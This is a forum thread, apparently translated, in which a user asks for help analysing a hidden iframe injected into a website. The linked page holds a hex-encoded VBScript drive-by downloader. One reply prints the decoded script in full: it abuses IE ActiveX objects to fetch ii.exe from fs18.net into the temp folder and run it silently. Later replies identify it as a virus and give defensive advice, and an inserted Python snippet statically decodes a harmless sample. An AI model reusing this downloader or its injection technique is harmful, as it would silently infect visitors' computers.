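Offering high points: asking JS experts to help me analyze this code.
The site's home page has this nested in it: <iframe src=http://fs18.net/down8/dd.htm width=20 height=0 frameborder=0> </iframe>
After I downloaded the page http://fs18.net/down8/dd.htm, it contained the code below. Could an expert please help me analyze it?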
<html>
<body>
<script language= "JavaScript ">
function mymid(ss) {
return ss.substring(2);}
</script>
<script language= "VBScript ">
flag_type= "vbs "
S= "6f6E206572726F7220726573756d65206E6578740D0a6375726c3D22687474703A2F2f667331382E6E65742F646f776E382f "
S=S+ "69692e657865220D0a666E616D65313D2269692e657865220D0a666e616d65323d2269692e766273220d0a53657420646620 "
S=S+ "3D20646F63756D656E742E637265617465456C656d656E7428226F626A65637422290D0a64662e7365744174747269627574 "
S=S+ "652022636c6173736964222C2022636C7369643A42443936433535362D363541332D313144302d393833412d303043303446 "
S=S+ "433239453336220D0a7374723D224D6963726f736F66742e584d4c48545450220d0a5365742078203d2064662e4372656174 "
S=S+ "654F626A656374287374722C2222290D0A43313D2241646f220D0A43323d2264622e220D0A43333D22737472220D0A43343D "
S=S+ "2265616D220D0A737472313D43312643322643332643340D0A737472353D737472310D0a7365742053203d2064662E637265 "
S=S+ "6174656f626A65637428737472352c2222290D0a532e74797065203d20310D0A737472363D22474554220d0a782e4F70656e "
S=S+ "20737472362C206375726c2C2046616C73650D0a782E53656E640d0a73313d22536372697074220d0a73323d22696E672E22 "
S=S+ "0d0a73333D2246696C65220D0a73343d2253797374656D4F626a656374220d0a73303D73312B73322b73332B73340d0a7365 "
S=S+ "742046203D2064662E6372656174656f626a6563742873302C2222290d0a73657420746d70203d20462e4765745370656369 "
S=S+ "616C466F6c6465722832290D0a666E616d65313d20462e4275696c645061746828746D702c666E616D6531290D0a532e6f70 "
S=S+ "656E0D0A532e777269746520782e726573706F6e7365426F64790D0A532e73617665746f66696c6520666E616d65312C320d "
S=S+ "0A532E636C6f73650D0A666e616d65323D20462E4275696C645061746828746D702C666e616d6532290D0A53657420747320 "
S=S+ "3d20462E4f70656e5465787446696c6528666e616D65322C20322C2054727565290d0A74732E57726974654C696E65202253 "
S=S+ "6574205368656c6C203D204372656174654f626A656374282222577363726970742E5368656c6C222229220d0A73716C3D22 "
S=S+ "5368656c6C2e52756E282222222b666e616d65312B22222229220D0A74732e57726974654c696E652073716c0d0A74732E57 "
S=S+ "726974654C696e652022736574205368656c6C3D4e6F7468696E67220D0a74732E57726974654c696E652022693d31220d0a "
S=S+ "74732e636C6f73650d0a696620462e46696C6545786973747328666E616D6531293d74727565207468656e0d0a696620462E "
S=S+ "46696C6545786973747328666E616d6532293d74727565207468656E0d0a202020207368613D225368656C6c2e417070220D "
S=S+ "0a202020207368623D7368610d0A202020207365742051203D2064662E6372656174656f626a656374287368622b226c6963 "
S=S+ "6174696f6e222c2222290D0A20202020512e5368656c6c4578656375746520666E616d65322c22222c22222c226F70656e22 "
S=S+ "2c300D0A656E642069660d0a656e642069660D0a "
D= " "
DO WHILE LEN(S)> 1
k= "&H "+ucase(LEFT(S,2))
p=CLng(k)
m=chr(p)
D=D+m
S=mymid(S)
LOOP
if flag_type= "vbs " then
EXECUTE D
end if
if flag_type= "html " then
document.write(D)
end if
</script>
<script language= "javaScript ">
if (flag_type== "js ") {
eval(D);}
</script>
</body>
</html>
<DIV style= "CURSOR: url(ah.c) "> </DIV>
<iframe src= "vip1.htm " width= "0 " height= "0 " border= "0 "> </iframe>
<script src= 'http://s128.cnzz.com/stat.php?id=620367&web_id=620367 ' language= 'JavaScript ' charset= 'gb2312 '> </script>
<script type= "text/jscript "> function init() { document.write( " ");}window.onload = init; </script>
<body oncontextmenu= "return false " onselectstart= "return false " ondragstart= "return false ">
[Solution]
on error resume next
curl= "http://fs18.net/down8/ii.exe "
fname1= "ii.exe "
fname2= "ii.vbs "
Set df = document.createElement( "object ")
df.setAttribute "classid ", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 "
str= "Microsoft.XMLHTTP "
Set x = df.CreateObject(str, " ")
C1= "Ado "
C2= "db. "
C3= "str "
C4= "eam "
str1=C1&C2&C3&C4
str5=str1
set S = df.createobject(str5, " ")
S.type = 1
str6= "GET "
x.Open str6, curl, False
x.Send
s1= "Script "
s2= "ing. "
s3= "File "
s4= "SystemObject "
s0=s1+s2+s3+s4
set F = df.createobject(s0, " ")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
fname2= F.BuildPath(tmp,fname2)
Set ts = F.OpenTextFile(fname2, 2, True)
ts.WriteLine "Set Shell = CreateObject( " "Wscript.Shell " ") "
sql= "Shell.Run( " " "+fname1+ " " ") "
ts.WriteLine sql
ts.WriteLine "set Shell=Nothing "
ts.WriteLine "i=1 "
ts.close
if F.FileExists(fname1)=true then
if F.FileExists(fname2)=true then
    sha= "Shell.App "
    shb=sha
    set Q = df.createobject(shb+ "lication ", " ")
    Q.ShellExecute fname2, " ", " ", "open ",0
end if
end if
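[Solution]
Looks like JS calling VBS stuff.
These days everyone uses Firefox, so VBS can't be used anyway.
[Solution]
This looks like a virus.
[Solution]
Here to learn.
[Solution]
It's a virus; it exploits an IE vulnerability.
The S at the front is the binary code of the virus body.
D is the decoded virus.
This line
EXECUTE D
executes it.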
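The decoding step described in this answer (S holds the hex-encoded body, D is the decoded text handed to EXECUTE) can be reproduced statically, without running anything. The Python below is an added example, not code from the thread; SAMPLE_PLAIN with its example.invalid URL and all-zero CLSID is a constructed stand-in, and the function names are hypothetical. It goes slightly beyond the thread by also folding split string fragments back into whole names.

```python
import re

# Constructed sample, not the page's payload: a harmless stand-in that uses the
# same idioms (hex-encoded body, a ProgID split into fragments, placeholder URL
# and CLSID), laid out as S= "..." / S=S+ "..." lines like the posted page.
SAMPLE_PLAIN = ('curl="http://example.invalid/sample.bin"\r\n'
                'C1="Ado"\r\nC2="db."\r\nC3="str"\r\nC4="eam"\r\n'
                'str1=C1&C2&C3&C4\r\n'
                'df.setAttribute "classid", "clsid:00000000-0000-0000-0000-000000000000"\r\n')
SAMPLE_HEX = SAMPLE_PLAIN.encode("ascii").hex()
SAMPLE_PAGE = 'S= "%s "\nS=S+ "%s "\n' % (SAMPLE_HEX[:60], SAMPLE_HEX[60:])

_OPERAND = r'(?:"[^"]*"|\w+)'
_ASSIGN = re.compile(r'\s*(\w+)\s*=\s*(%s(?:\s*[&+]\s*%s)*)\s*$' % (_OPERAND, _OPERAND))

def decode_payload(page):
    """Rebuild D from the S literals as text only; nothing is executed."""
    parts = re.findall(r'^\s*S\s*=\s*(?:S\s*\+\s*)?"([0-9a-f\s]*)"', page, re.I | re.M)
    hexstr = re.sub(r"\s+", "", "".join(parts))   # drop stray spaces left by scraping
    hexstr = hexstr[:len(hexstr) // 2 * 2]        # the page's loop stops when LEN(S) <= 1
    return bytes.fromhex(hexstr).decode("latin-1")

def resolve_strings(script):
    """Fold name="lit" and name=a&b+c assignments so split strings become whole."""
    env = {}
    for line in script.splitlines():
        m = _ASSIGN.match(line)
        toks = re.findall(_OPERAND, m.group(2)) if m else []
        vals = [t[1:-1] if t.startswith('"') else env.get(t.lower()) for t in toks]
        if vals and None not in vals:             # skip anything with an unknown operand
            env[m.group(1).lower()] = "".join(vals)
    return env

def indicators(script):
    """Collect what a blocklist or detection rule needs from the decoded text."""
    env = resolve_strings(script)
    return {
        "urls": sorted(set(re.findall(r'https?://[^\s"\']+', script, re.I))),
        "clsids": sorted({c.upper() for c in re.findall(r'clsid:([0-9a-f-]{36})', script, re.I)}),
        "progid_candidates": {k: v for k, v in env.items()
                              if re.fullmatch(r'[A-Za-z]\w*(?:\.\w+)+', v)},
    }

if __name__ == "__main__":
    print(indicators(decode_payload(SAMPLE_PAGE)))
```

To triage a saved copy of a suspicious page, pass the file's text to decode_payload in place of SAMPLE_PAGE and review the result as text.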
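[Solution]
You need to check whether the server-side page itself carries the virus, or whether the virus is being injected by something like ARP spoofing.
If it is the server itself, you can only avoid visiting it or add an antivirus gateway at your network egress; you can also try applying patches.
If it is ARP spoofing, first find which machine is infected with the ARP virus.
In any case, the patches cannot be skipped.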